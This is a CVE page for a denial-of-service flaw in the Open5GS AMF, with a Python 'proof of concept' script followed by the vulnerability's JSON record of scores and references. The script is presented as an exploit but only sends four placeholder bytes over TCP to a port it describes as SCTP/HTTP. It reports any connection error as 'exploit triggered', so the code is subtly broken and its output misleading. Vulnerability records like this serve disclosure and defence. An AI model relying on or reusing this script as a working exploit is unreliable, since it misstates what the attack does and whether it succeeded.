CVE-2026-7585

#!/usr/bin/env python3 # PoC for CVE-2026-7585 (Open5GS DoS) # This script is a conceptual demonstration. # It sends a malformed packet to the AMF NUDM interface. import socket import struct def send_exploit(target_ip, target_port): try: # Create a TCP socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) # Construct a malicious payload targeting the vulnerable function # In a real scenario, this would be a specific NGAP or NAS message # triggering the nudm-handler issue. payload = b"\x00\x00\x00\x01" # Example trigger bytes print(f"[*] Sending exploit payload to {target_ip}:{target_port}") s.send(payload) # Wait for response or crash response = s.recv(1024) print("[+] Server responded (might not crash immediately)") except Exception as e: print(f"[-] Exploit triggered or connection error: {e}") finally: s.close() if __name__ == "__main__": # Replace with actual target AMF address target = "127.0.0.1" port = 38412 # Example SCTP/HTTP port for Open5GS AMF send_exploit(target, port)

{"cve": {"id": "CVE-2026-7585", "sourceIdentifier": "[email protected]", "published": "2026-05-01T16:16:33.490", "lastModified": "2026-05-07T01:47:52.527", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Open5GS up to 2.7.7. The impacted element is the function amf_nudm_sdm_handle_provisioned of the file /src/amf/nudm-handler.c of the component AMF. Executing a manipulation can lead to denial of service. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.7", "matchCriteriaId": "0A46BC99-08E7-4D40-A908-76121E4AFCD5"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/open5gs/open5gs/issues/4403", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://vuldb.com/submit/804334", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/submit/804335", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/submit/804337", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/360533", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/360533/cti", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/submit/804334", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/submit/804335", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/submit/804337", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory", "VDB Entry"]}]}}